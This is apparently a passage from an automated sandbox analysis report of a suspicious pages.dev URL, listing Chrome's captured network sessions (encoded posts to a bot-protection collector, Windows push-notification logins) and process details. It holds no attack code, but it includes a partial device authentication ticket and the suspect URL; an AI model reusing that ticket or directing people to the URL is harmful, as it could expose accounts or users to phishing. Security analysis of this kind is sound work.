2024-08-31 22:55:03 UTC	650	OUT	POST /api/v2/msft HTTP/1.1 Host: collector-pxzc5j78di.hsprotect.net Connection: keep-alive Content-Length: 8951 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-type: application/x-www-form-urlencoded Accept: / Origin: https://msft.hsprotect.net Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://msft.hsprotect.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:03 UTC	8951	OUT	Data Raw: 70 61 79 6c 6f 61 64 3d 61 55 6b 51 52 68 41 49 45 47 70 6a 63 31 31 7a 53 6b 5a 43 65 30 68 33 44 78 41 65 45 46 59 51 43 45 6b 51 66 57 46 46 66 31 41 42 43 33 64 32 5a 45 55 50 45 41 67 44 42 51 41 48 41 77 59 47 43 77 49 41 41 77 55 48 48 68 42 71 41 6d 74 44 59 47 42 5a 52 48 6c 63 42 67 38 51 43 41 45 4b 42 51 59 42 41 77 6f 65 45 46 4e 59 66 31 52 2f 63 55 70 54 64 58 4e 52 44 78 41 49 41 41 4d 46 41 41 51 47 43 77 59 46 41 42 34 51 63 47 70 61 52 58 30 43 66 31 46 52 59 31 30 50 45 41 67 48 43 67 55 43 42 77 59 45 48 68 42 33 52 55 4a 66 63 57 52 6b 52 32 74 32 51 51 38 51 43 42 42 68 55 30 59 53 63 30 64 56 45 67 45 44 45 67 41 43 41 41 59 53 41 77 6f 49 42 77 63 49 41 67 4d 53 64 58 39 6d 48 77 49 47 41 67 49 53 47 6e 64 54 51 55 5a 58 51 46 77 Data Ascii: payload=aUkQRhAIEGpjc11zSkZCe0h3DxAeEFYQCEkQfWFFf1ABC3d2ZEUPEAgDBQAHAwYGCwIAAwUHHhBqAmtDYGBZRHlcBg8QCAEKBQYBAwoeEFNYf1R/cUpTdXNRDxAIAAMFAAQGCwYFAB4QcGpaRX0Cf1FRY10PEAgHCgUCBwYEHhB3RUJfcWRkR2t2QQ8QCBBhU0YSc0dVEgEDEgACAAYSAwoIBwcIAgMSdX9mHwIGAgISGndTQUZXQFw
2024-08-31 22:55:03 UTC	400	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:55:03 GMT Content-Type: application/json; charset=utf-8 Content-Length: 848 Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: https://msft.hsprotect.net Timing-Allow-Origin: * Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-08-31 22:55:03 UTC	848	IN	Data Raw: 7b 22 64 6f 22 3a 6e 75 6c 6c 2c 22 6f 62 22 3a 22 50 6d 41 2b 59 44 35 67 63 31 42 2f 64 7a 78 7a 50 44 77 2f 63 7a 68 71 4f 57 30 37 4e 7a 6b 34 4f 7a 34 2f 50 6d 78 70 61 6a 77 32 61 57 30 35 4f 7a 38 39 50 44 68 73 50 6a 31 71 62 6d 77 35 62 44 73 32 4f 47 31 73 62 44 5a 73 61 57 34 39 62 57 6f 33 4f 7a 73 37 4e 32 6c 74 4e 32 30 36 50 44 6f 32 4f 54 59 35 61 57 77 31 4f 69 42 59 4f 31 39 74 4e 30 5a 68 54 58 31 56 57 55 52 4f 65 54 74 68 4e 33 64 37 66 6d 31 63 50 6e 74 32 52 47 4d 39 57 47 74 46 56 54 35 73 4f 6a 5a 6c 59 6d 35 2f 52 47 31 59 58 48 68 59 64 57 5a 58 4a 44 5a 57 53 58 31 35 50 57 42 6c 61 58 64 4e 5a 48 5a 2f 53 6a 78 56 53 45 68 45 59 45 52 33 51 79 52 2b 57 58 31 4e 4f 46 74 6c 50 6d 67 79 4d 6a 55 2b 50 7a 38 2f 4e 55 5a 34 51 6b Data Ascii: {"do":null,"ob":"PmA+YD5gc1B/dzxzPDw/czhqOW07Nzk4Oz4/Pmxpajw2aW05Oz89PDhsPj1qbmw5bDs2OG1sbDZsaW49bWo3Ozs7N2ltN206PDo2OTY5aWw1OiBYO19tN0ZhTX1VWUROeTthN3d7fm1cPnt2RGM9WGtFVT5sOjZlYm5/RG1YXHhYdWZXJDZWSX15PWBlaXdNZHZ/SjxVSEhEYER3QyR+WX1NOFtlPmgyMjU+Pz8/NUZ4Qk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	49799	13.107.246.60	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:03 UTC	364	OUT	GET /images/favicon.ico?v=2 HTTP/1.1 Host: acctcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:03 UTC	743	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:55:03 GMT Content-Type: image/x-icon Content-Length: 17174 Connection: close Cache-Control: public, max-age=604800 Last-Modified: Thu, 29 Aug 2024 20:32:52 GMT ETag: 0x8DCC869C18A99EA x-ms-request-id: 0e587b6c-501e-0024-7e80-fab52c000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240831T225503Z-16579567576pgh4h94c7qn0kuc00000005m00000000038rt x-fd-int-roxy-purgeid: 67912908 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-08-31 22:55:03 UTC	15641	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-08-31 22:55:03 UTC	1533	IN	Data Raw: 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333""

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	49801	35.190.10.96	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:04 UTC	369	OUT	GET /api/v2/msft HTTP/1.1 Host: collector-pxzc5j78di.hsprotect.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:04 UTC	284	IN	HTTP/1.1 405 Method Not Allowed Date: Sat, 31 Aug 2024 22:55:03 GMT Content-Type: application/json; charset=utf-8 Content-Length: 31 Allow: POST, HEAD, OPTIONS Timing-Allow-Origin: * Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-08-31 22:55:04 UTC	31	IN	Data Raw: 7b 22 65 72 72 6f 72 22 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 22 7d 0a Data Ascii: {"error":"Method Not Allowed"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	49803	35.190.10.96	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:08 UTC	650	OUT	POST /api/v2/msft HTTP/1.1 Host: collector-pxzc5j78di.hsprotect.net Connection: keep-alive Content-Length: 6499 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-type: application/x-www-form-urlencoded Accept: / Origin: https://msft.hsprotect.net Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://msft.hsprotect.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:08 UTC	6499	OUT	Data Raw: 70 61 79 6c 6f 61 64 3d 61 55 6b 51 52 68 41 49 45 47 56 6a 52 55 46 32 53 67 74 65 65 56 68 64 44 78 41 65 45 46 59 51 43 45 6b 51 64 6d 70 77 42 6e 38 43 56 57 74 52 52 58 38 50 45 41 67 51 42 6c 4d 43 42 56 46 57 43 77 56 58 43 67 46 51 42 77 51 44 56 41 52 57 56 67 70 52 55 77 45 45 41 67 55 4b 56 67 6f 4b 56 6c 63 51 48 68 42 55 64 33 64 34 63 31 68 5a 58 58 5a 32 63 77 38 51 43 42 41 47 55 77 49 46 55 56 59 4c 42 56 63 4b 41 56 41 48 42 41 4e 55 42 46 5a 57 43 6c 46 54 41 51 51 43 42 51 70 57 43 67 70 57 56 78 41 65 45 48 56 78 41 6b 5a 2b 58 67 64 78 65 56 6f 47 44 78 41 49 45 46 4d 46 42 67 4a 58 56 31 52 57 56 67 4e 52 43 67 49 43 41 51 73 42 43 31 5a 58 55 41 51 46 56 77 49 4c 42 67 63 43 43 77 42 57 45 42 34 51 59 46 34 4c 53 48 70 7a 66 30 70 Data Ascii: payload=aUkQRhAIEGVjRUF2SgteeVhdDxAeEFYQCEkQdmpwBn8CVWtRRX8PEAgQBlMCBVFWCwVXCgFQBwQDVARWVgpRUwEEAgUKVgoKVlcQHhBUd3d4c1hZXXZ2cw8QCBAGUwIFUVYLBVcKAVAHBANUBFZWClFTAQQCBQpWCgpWVxAeEHVxAkZ+XgdxeVoGDxAIEFMFBgJXV1RWVgNRCgICAQsBC1ZXUAQFVwILBgcCCwBWEB4QYF4LSHpzf0p
2024-08-31 22:55:08 UTC	400	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:55:07 GMT Content-Type: application/json; charset=utf-8 Content-Length: 248 Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: https://msft.hsprotect.net Timing-Allow-Origin: * Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-08-31 22:55:08 UTC	248	IN	Data Raw: 7b 22 64 6f 22 3a 6e 75 6c 6c 2c 22 6f 62 22 3a 22 59 47 41 2b 50 6d 42 67 63 32 78 36 63 58 46 78 63 57 41 2b 50 6a 35 67 59 44 34 2b 63 31 42 2f 64 32 74 71 63 7a 77 38 50 33 4d 36 50 6a 78 70 4f 44 63 2f 4f 32 6f 33 62 44 68 70 4f 32 74 73 50 44 64 72 50 32 74 71 62 6d 73 39 50 6a 6c 75 50 7a 34 34 62 44 6b 2b 4e 6d 6b 35 50 7a 63 36 61 32 6b 37 50 32 6c 74 62 54 30 39 4e 32 6f 2b 62 57 74 71 4f 6a 59 38 62 54 63 33 61 54 59 32 4e 57 70 32 52 54 39 75 57 44 35 6a 62 44 78 64 5a 32 31 58 54 6d 5a 41 5a 55 6f 38 51 6d 56 61 64 30 46 4c 58 6a 70 43 53 32 67 2f 51 6e 56 6f 66 45 5a 69 56 57 6c 75 50 55 5a 6d 51 47 56 4f 66 45 5a 69 59 33 68 57 50 6a 5a 2f 56 55 78 47 4f 56 67 2b 50 6a 5a 7a 65 33 31 36 61 6e 4d 38 50 7a 38 3d 22 7d 0a Data Ascii: {"do":null,"ob":"YGA+PmBgc2x6cXFxcWA+Pj5gYD4+c1B/d2tqczw8P3M6PjxpODc/O2o3bDhpO2tsPDdrP2tqbms9PjluPz44bDk+Nmk5Pzc6a2k7P2ltbT09N2o+bWtqOjY8bTc3aTY2NWp2RT9uWD5jbDxdZ21XTmZAZUo8QmVad0FLXjpCS2g/QnVofEZiVWluPUZmQGVOfEZiY3hWPjZ/VUxGOVg+PjZze316anM8Pz8="}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	49804	35.190.10.96	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:08 UTC	369	OUT	GET /api/v2/msft HTTP/1.1 Host: collector-pxzc5j78di.hsprotect.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:55:09 UTC	284	IN	HTTP/1.1 405 Method Not Allowed Date: Sat, 31 Aug 2024 22:55:09 GMT Content-Type: application/json; charset=utf-8 Content-Length: 31 Allow: HEAD, POST, OPTIONS Timing-Allow-Origin: * Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-08-31 22:55:09 UTC	31	IN	Data Raw: 7b 22 65 72 72 6f 72 22 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 22 7d 0a Data Ascii: {"error":"Method Not Allowed"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	49805	40.113.103.199	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:11 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 57 54 46 55 44 75 6d 68 6d 45 65 49 57 41 4b 52 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 35 33 37 34 36 65 63 63 36 34 38 31 32 64 34 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: WTFUDumhmEeIWAKR.1Context: 453746ecc64812d4
2024-08-31 22:55:11 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-08-31 22:55:11 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 57 54 46 55 44 75 6d 68 6d 45 65 49 57 41 4b 52 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 35 33 37 34 36 65 63 63 36 34 38 31 32 64 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 37 42 6f 6e 47 4e 65 45 4c 64 79 76 63 53 63 65 6e 48 56 42 2b 64 68 69 48 69 31 36 4f 43 45 66 54 71 33 4e 58 31 55 54 72 4c 71 65 34 76 79 79 52 76 41 4c 75 54 53 39 69 2f 65 67 41 2f 2b 63 32 33 6f 6f 4d 71 6a 47 55 4c 43 68 2b 4f 39 68 70 52 73 47 6c 32 48 56 6f 65 79 6a 79 6e 37 32 71 66 66 70 36 56 57 7a 64 66 31 46 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: WTFUDumhmEeIWAKR.2Context: 453746ecc64812d4<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAW7BonGNeELdyvcScenHVB+dhiHi16OCEfTq3NX1UTrLqe4vyyRvALuTS9i/egA/+c23ooMqjGULCh+O9hpRsGl2HVoeyjyn72qffp6VWzdf1F
2024-08-31 22:55:11 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 57 54 46 55 44 75 6d 68 6d 45 65 49 57 41 4b 52 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 35 33 37 34 36 65 63 63 36 34 38 31 32 64 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: WTFUDumhmEeIWAKR.3Context: 453746ecc64812d4<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-08-31 22:55:12 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-08-31 22:55:12 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 54 55 4c 64 56 69 72 52 70 30 71 50 59 79 6c 57 6f 72 2b 6d 44 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: TULdVirRp0qPYylWor+mDg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.6	50608	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:55:37 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 7a 4a 4e 6c 67 31 34 48 67 30 32 48 6e 66 66 48 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 30 62 63 65 36 33 62 63 63 36 36 32 38 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: zJNlg14Hg02HnffH.1Context: 7d0bce63bcc66280
2024-08-31 22:55:37 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-08-31 22:55:37 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 7a 4a 4e 6c 67 31 34 48 67 30 32 48 6e 66 66 48 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 30 62 63 65 36 33 62 63 63 36 36 32 38 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 37 42 6f 6e 47 4e 65 45 4c 64 79 76 63 53 63 65 6e 48 56 42 2b 64 68 69 48 69 31 36 4f 43 45 66 54 71 33 4e 58 31 55 54 72 4c 71 65 34 76 79 79 52 76 41 4c 75 54 53 39 69 2f 65 67 41 2f 2b 63 32 33 6f 6f 4d 71 6a 47 55 4c 43 68 2b 4f 39 68 70 52 73 47 6c 32 48 56 6f 65 79 6a 79 6e 37 32 71 66 66 70 36 56 57 7a 64 66 31 46 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: zJNlg14Hg02HnffH.2Context: 7d0bce63bcc66280<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAW7BonGNeELdyvcScenHVB+dhiHi16OCEfTq3NX1UTrLqe4vyyRvALuTS9i/egA/+c23ooMqjGULCh+O9hpRsGl2HVoeyjyn72qffp6VWzdf1F
2024-08-31 22:55:37 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 7a 4a 4e 6c 67 31 34 48 67 30 32 48 6e 66 66 48 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 64 30 62 63 65 36 33 62 63 63 36 36 32 38 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: zJNlg14Hg02HnffH.3Context: 7d0bce63bcc66280<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-08-31 22:55:37 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-08-31 22:55:37 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 46 62 4c 68 64 51 71 43 38 55 65 7a 43 78 42 33 4b 51 43 6a 31 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: FbLhdQqC8UezCxB3KQCj1A.0Payload parsing failed.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 2020, Parent PID: 5732

General

Target ID:	0
Start time:	18:54:23
Start date:	31/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 2732, Parent PID: 2020

General

Target ID:	2
Start time:	18:54:28
Start date:	31/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=1996,i,7857939130896594004,14220038804681611000,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6504, Parent PID: 5732

General

Target ID:	3
Start time:	18:54:30
Start date:	31/08/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/"
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly